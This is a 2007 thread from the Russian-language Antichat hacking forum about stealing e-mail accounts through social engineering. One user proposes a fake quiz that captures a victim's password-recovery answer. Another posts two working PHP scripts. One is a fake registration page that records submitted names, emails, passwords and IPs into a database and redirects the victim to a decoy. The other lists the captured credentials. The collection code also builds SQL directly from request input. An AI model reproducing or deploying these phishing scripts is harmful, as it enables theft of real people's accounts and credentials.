ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, сейчас доступен на antichat.xyz.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Есть предложение
  #1  
Старый 16.11.2007, 13:04
SSSetuPPP
Познающий
Регистрация: 22.01.2007
Сообщений: 32
Провел на форуме:
214445

Репутация: 0
Exclamation Есть предложение

Можно написать какой-нибудь "тест " с множеством вопросов и среди них ввести вопрос, который требуется при восстановлении пароля, а все ответы будут записываться в файл (например .txt) и выложить тест на соём сайте. Ссылочку дать "жертве".

Только вот проблема в "написать". Если у кого и получиться выложите, пожалуйста в теме.

Последний раз редактировалось SSSetuPPP; 16.11.2007 в 13:22..
 
Ответить с цитированием

  #2  
Старый 16.11.2007, 15:50
TrypoED
Banned
Регистрация: 22.04.2007
Сообщений: 213
Провел на форуме:
1031650

Репутация: 148
По умолчанию

Удобней сделать закрытый сайт и как-будто туда без регистрации не попасть , создать саму страничку регистрации и чтобы это сохранялось в файлике... Собственно такой скрипт у меня есть...
 
Ответить с цитированием

  #3  
Старый 16.11.2007, 16:33
SSSetuPPP
Познающий
Регистрация: 22.01.2007
Сообщений: 32
Провел на форуме:
214445

Репутация: 0
Exclamation

Выложи скрипт
 
Ответить с цитированием

  #4  
Старый 16.11.2007, 18:47
TrypoED
Banned
Регистрация: 22.04.2007
Сообщений: 213
Провел на форуме:
1031650

Репутация: 148
По умолчанию

check.php

PHP код:
$dblocation "xxx"// Имя SQL сервера
$dbuser "xxx";          // Имя пользователя
$dbpasswd "xxx";            // Пароль
$dbname 'polygon4';
$dbfeld 'Users';

$PARAM array_merge($_GET$_POST);
$param_names array_keys($PARAM);
$num_params count($PARAM);
$login $PARAM['name'];
$mail $PARAM['mail'];
$pass $PARAM['pass'];


// а теперь поехали с таблицей...

header("Location: http://ultimate-action.com/done.html"); //редирект чтоб отвлечь юзера

$ip = isset($_REQUEST['ip']) && $_REQUEST['ip'] != '' $_REQUEST['ip'] : $_SERVER['REMOTE_ADDR'];
$time date(" h:I:s G");

$dbcnx = @mysql_connect($dblocation,$dbuser,$dbpasswd);
if (!
$dbcnx
{
  
// Выводим предупреждение
  
echo ("<P>В настоящий момент сервер базы данных не доступен, поэтому 
  корректное отображение страницы невозможно.</P>"
);
  
// Завершаем работу в случае неудачи
  
exit();
}

if (!@
mysql_select_db($dbname$dbcnx)) 
{
  echo( 
"<P>В настоящий момент база данных не доступна, поэтому
            корректное отображение страницы невозможно.</P>" 
);
  exit();
}
//Меняем кодировку , чтоб Flash могла её прочитать...
#mysql_query("SET NAMES 'utf8'");

 //поехали заполнять ответ

$query "INSERT INTO $dbfeld ( `name` , `mail` , `pass` , `time` , `ip` ) VALUES ('$login', '$mail', '$pass', '$time', '$ip');";
mysql_query($query) or die(mysql_error());

mysql_close($dbcnx// разрываем соединение 
snow.php

PHP код:
$dblocation "XXX"// Имя SQL сервера
$dbuser "XXX";          // Имя пользователя
$dbpasswd "XXX";            // Пароль
$dbname 'XXX';
$dbfeld 'Users';

$dbcnx = @mysql_connect($dblocation,$dbuser,$dbpasswd);
if (!
$dbcnx
{
 
  
// Завершаем работу в случае неудачи
  
exit();
}
if (!@
mysql_select_db($dbname$dbcnx)) 
{
  echo( 
"<P>В настоящий момент база данных не доступна, поэтому
            корректное отображение страницы невозможно.</P>" 
);
  exit();
}


$ath mysql_query("select * from $dbfeld;"); 
if(
$ath)
{
  
// Определяем таблицу и заголовок
  
echo "<table border=1>";
  echo 
"<tr><td>Имя</td><td>Пароль</td><td>E-mail</td><td>ip</td><td>Время</td></tr>";
  
// Так как запрос возвращает несколько строк, применяем цикл
  
while($author mysql_fetch_array($ath))
  {
    echo 
"<tr><td>".$author['name']."&nbsp;</td><td>".$author['pass']."
    &nbsp </td><td>"
.$author['mail']."&nbsp;</td><td>".  
    
$author['ip']."&nbsp;</td> <td>".  
    
$author['time']."&nbsp;</td></tr>";
  }
  echo 
"</table>";
  echo 
"(copyright) Jes";
}
else
{
  echo 
"<p><b>Error: ".mysql_error()."</b><p>";
  exit();

Вот скрипты
 
Ответить с цитированием

  #5  
Старый 17.11.2007, 03:17
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Это частный случай СИ, аналогичный методу Fake. Ничего нового я здесь не вижу
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #6  
Старый 17.11.2007, 16:31
TrypoED
Banned
Регистрация: 22.04.2007
Сообщений: 213
Провел на форуме:
1031650

Репутация: 148
По умолчанию

Цитата:
Сообщение от Constantine  
Это частный случай СИ, аналогичный методу Fake. Ничего нового я здесь не вижу
Согласен...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
FAQ по выделенным серверам †Romi4† Авторские статьи 4 31.08.2009 16:19
Аккуант привязан ли к Dsl линии (номеру телефона линии, где есть Dsl)? -=lebed=- Телефония и связь 3 22.12.2006 18:35
FAQ по выделенным серверам (Dedicated Servers) byte57 Чужие Статьи 4 16.11.2006 22:03
Есть вопрос на счёт чата Чаты 6 12.09.2002 17:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ